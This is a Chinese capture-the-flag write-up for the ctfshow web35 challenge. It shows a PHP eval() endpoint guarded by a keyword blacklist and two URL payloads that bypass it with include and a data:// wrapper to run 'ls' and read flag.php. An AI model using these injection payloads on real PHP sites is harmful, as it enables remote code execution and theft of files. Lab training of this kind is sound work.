当前位置: 首页 > news >正文

[ctfshow web入门] web35

news 来源:原创 2025/6/20 13:44:38

信息收集

这一题多了尖括号< =的过滤,这也没啥影响

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

解题

参考[ctfshow web入门] web31
使用最简单的解法,具体描述参考web31,不再赘述

?c=include$_GET[1]?>&1=data://text/plain,<?php system("ls") ?>
?c=include$_GET[1]?>&1=data://text/plain,<?php system("tac flag.php") ?>

在这里插入图片描述

web34    目录    web36

相关文章:

  • 【多线程-第四天-自己模拟SDWebImage的下载图片功能-缓存管理 Objective-C语言】
  • 2025最新系统 Git 教程(五)
  • 【Python算法】基础语法、算法技巧模板、二分、DFS与BFS
  • selenium快速入门
  • 如何实现H5端对接钉钉登录并优雅扩展其他平台
  • 《计算机视觉度量:从特征描述到深度学习》—深度学习工业检测方案评估
  • 人工智能在医疗信息化设备上为医疗行业带来了诸多变革
  • vscode 连不上 Ubuntu 18 server 的解决方案
  • MySQL:日志
  • TDEngine 配置
  • Spring AI应用:利用DeepSeek+嵌入模型+Milvus向量数据库实现检索增强生成--RAG应用(超详细)
  • 根据 PID 找到对应的 Docker 容器
  • 【专题】图论
  • Docker 容器内运行程序的性能开销
  • 使用SQL查询ES数据
  • 考研单词笔记 2025.04.10
  • Ansible:Playbook-template模板详解
  • STM32F103C8T6单片机开发:简单说说单片机的外部GPIO中断(标准库)
  • 基于landsat与Modis影像的遥感技术的生态环境质量评价
  • 纯键盘操作电脑,丢弃鼠标!!!
  • 祁阳网站建设/网站优化排名方法
  • 信贷网站开发/谷歌海外广告投放
  • 中卫市住房和城乡建设局网站/百度seo关键词优化方案
  • ecshop网站后台批量上传图片/第三方营销平台有哪些
  • iphone做网站服务器/深圳网络推广引流
  • 安徽安庆网站建设公司/seo搜索引擎优化工具